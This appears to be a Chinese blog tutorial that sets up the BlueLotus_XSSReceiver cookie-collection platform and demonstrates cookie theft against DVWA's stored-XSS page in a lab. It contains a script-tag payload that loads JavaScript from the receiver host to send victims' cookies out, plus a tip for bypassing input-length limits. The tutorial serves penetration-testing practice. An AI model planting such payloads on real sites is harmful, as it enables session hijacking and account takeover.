打Cookie小工具_BlueLotus_XSSReceiver

简介: 打Cookie小工具_BlueLotus_XSSReceiver

01 什么是打cookie?


网上其实已经有很多非常好的解释了,在这里一句话总结下就是:在你访问的页面上执行了一次JS代码,这次代码执行之后可以获取你当前已经登录某个网站的cookie,并将该cookie发送到攻击者指定的网站,攻击者利用当前的cookie来登录你的网站。


攻击者用来接收cookie的平台就叫做xss 平台,在网上这种平台其实非常多,但是如果用过的同学应该有些感触,有些平台存在黑吃黑的情况(懂得都懂),而且好多渗透测试任务都是保密的,不可能去使用第三方平台。




02 cookie接收平台


一般来说,cookie接收平台现在比较好的平台是xss-platform,很多平台都在其基础上进行二次开发(或者叫做类似,笔者也不是很清楚谁比谁先),适合多人使用。

当然,这里就还有一个比较小,但是有时候同样够用的平台BlueLotus_XSSReceiver,这个平台的优点就是足够小,不需要数据库。缺点就是一般只适合一个人使用。


2.1 BlueLotus_XSSReceiver安装


BlueLotus_XSSReceiver安装的时候是需要php运行环境的,这里我就以win7下的phpstudy为例,主要是足够简单。


首先安装phpstudy,这里我安装的是2018版本,这个非常简单,在这里就不演示了。


BlueLotus_XSSReceiver的代码放在其www目录下,在这里可以将文件夹修改名字,我这里就不修改了,然后直接访问部署phpstudy的ip+文件夹名字。


直接访问

http://10.211.55.9/BlueLotus_XSSReceiver/



直接点击安装,在这里我只修改了后台需要登录的密码,在这里注意这个登录密码自己一定要记住,后期理论上是无法找回的。


点击提交即可,在这里本来是可以配置SMTP邮箱提醒的,但是我试过很多次,发现执行不了。


安装成功



03  XSS打Cookie示例


打开之后是这样的,在这里先建立一个xss来试试


在公共模版里面 default.js里面是可以获取后台地址和cookie的,所以一会使用这个就好了。

在我的JS里面,按照如下步骤进行,在第5步的时候会提示你需要先新增,新增之后再生成payload


继续,在这里就是你的payload了,当然这里的是没有经过任何变形的,如果需要变形,看右侧。


<script src="http://10.211.55.9/BlueLotus_XSSReceiver/myjs/test_XSS.js"></script>


然后在win7里面开一个dvwa来测试xss

DVWA的等级设置为low级别。



然后来到XSS(Stored)


<script src="http://10.211.55.9/BlueLotus_XSSReceiver/myjs/test_XSS.js"></script>

放入评论中去,当然在这里对输入长度有限制,可以使用F12来修改下代码长度限制即可。



使用开发者工具写入,然后保存



保存之后刷新该界面


此时在XSS平台内部就有一个提示,打到了Cookie。



打开之后,就会看到这些信息,获取cookie成功。



04  补充


BlueLotus_XSSReceiver工具只是一个非常简单的XSS获取工具,感谢开发作者的付出,以上过程仅仅用来非常简单的演示

如果你想下载该工具,有以下几种方式:

1. 后台回复:  xss工具   下载

  1. 在我的GitHub上进行下载,地址为:

https://github.com/crow821/
相关文章
|
6月前
|
存储 Web App开发 安全
Cookie和session 及Web相关工具
Cookie和session 及Web相关工具
|
前端开发 数据安全/隐私保护
工具库用久了,你还会原生操作 Cookie 吗?
用得好了,工具库和框架确实是一大助力,但就怕我们会因此习惯了走捷径,而忘了自己的根本依靠是什么。
87 0
工具库用久了,你还会原生操作 Cookie 吗?
|
18天前
|
存储 安全 搜索推荐
理解Session和Cookie:Java Web开发中的用户状态管理
理解Session和Cookie:Java Web开发中的用户状态管理
40 4
|
21天前
|
存储 缓存 网络协议
计算机网络常见面试题(二):浏览器中输入URL返回页面过程、HTTP协议特点,GET、POST的区别,Cookie与Session
计算机网络常见面试题(二):浏览器中输入URL返回页面过程、HTTP协议特点、状态码、报文格式,GET、POST的区别,DNS的解析过程、数字证书、Cookie与Session,对称加密和非对称加密
|
1月前
|
缓存 Java Spring
servlet和SpringBoot两种方式分别获取Cookie和Session方式比较(带源码) —— 图文并茂 两种方式获取Header
文章比较了在Servlet和Spring Boot中获取Cookie、Session和Header的方法,并提供了相应的代码实例,展示了两种方式在实际应用中的异同。
163 3
servlet和SpringBoot两种方式分别获取Cookie和Session方式比较(带源码) —— 图文并茂 两种方式获取Header
|
1月前
|
存储 安全 数据安全/隐私保护
Cookie 和 Session 的区别及使用 Session 进行身份验证的方法
【10月更文挑战第12天】总之,Cookie 和 Session 各有特点,在不同的场景中发挥着不同的作用。使用 Session 进行身份验证是常见的做法,通过合理的设计和管理,可以确保用户身份的安全和可靠验证。
21 1
|
2月前
|
存储 缓存 数据处理
php学习笔记-php会话控制,cookie,session的使用,cookie自动登录和session 图书上传信息添加和修改例子-day07
本文介绍了PHP会话控制及Web常用的预定义变量,包括`$_REQUEST`、`$_SERVER`、`$_COOKIE`和`$_SESSION`的用法和示例。涵盖了cookie的创建、使用、删除以及session的工作原理和使用,并通过图书上传的例子演示了session在实际应用中的使用。
php学习笔记-php会话控制,cookie,session的使用,cookie自动登录和session 图书上传信息添加和修改例子-day07
|
2月前
|
存储 前端开发 Java
JavaWeb基础7——会话技术Cookie&Session
会话技术、Cookie的发送和获取、存活时间、Session钝化与活化、销毁、用户登录注册“记住我”和“验证码”案例
JavaWeb基础7——会话技术Cookie&Session
|
2月前
|
存储 安全 NoSQL
Cookie、Session、Token 解析
Cookie、Session、Token 解析
62 0